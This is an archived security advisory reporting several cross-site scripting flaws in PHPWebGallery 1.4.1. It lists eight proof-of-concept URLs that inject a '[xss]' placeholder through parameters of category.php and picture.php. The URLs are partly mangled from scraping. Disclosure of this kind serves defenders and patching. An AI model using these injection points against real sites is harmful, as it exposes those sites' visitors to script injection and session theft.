Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Web :: PHP :: b06-1532.htm

PHPWebGallery Multiple Cross Site Scripting Vulnerabilities



PHPWebGallery Multiple Cross Site Scripting Vulnerabilities
PHPWebGallery Multiple Cross Site Scripting Vulnerabilities



Title : PHPWebGallery Multiple Cross Site Scripting Vulnerabilities
Author: Mourad aka Psych0 
Moroccan Security Team
Vendor: www.phpwebgallery.net 
Software: PHPWebGallery
Version:  1.4.1

category.php and picture.php scripts are vulnerable to XSS attacks.

Exploits:

[xss">http://target/phpwebgallery_dir/category.php?cat=">[xss] 

[xss]&num=0">http://target/phpwebgallery_dir/category.php?cat=">[xss]&num=0 

[xss">http://target/phpwebgallery_dir/category.php?cat=1&num=">[xss] 

[xss]&search=date_available%3A2006-01-01">http://target/phpwebgallery_dir/category.php?cat=">[xss]&search=date_available%3A2006-01-01 

[xss">http://target/phpwebgallery_dir/category.php?cat=1&search=">[xss] 

[xss">http://target/phpwebgallery_dir/picture.php?cat=1&image_id=1&slideshow=">[xss] 

[xss">http://target/phpwebgallery_dir/picture.php?cat=1&image_id=1&show_metadata=">[xss] 

[xss">http://target/phpwebgallery_dir/picture.php?cat=1&image_id=1&start=">[xss] 


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH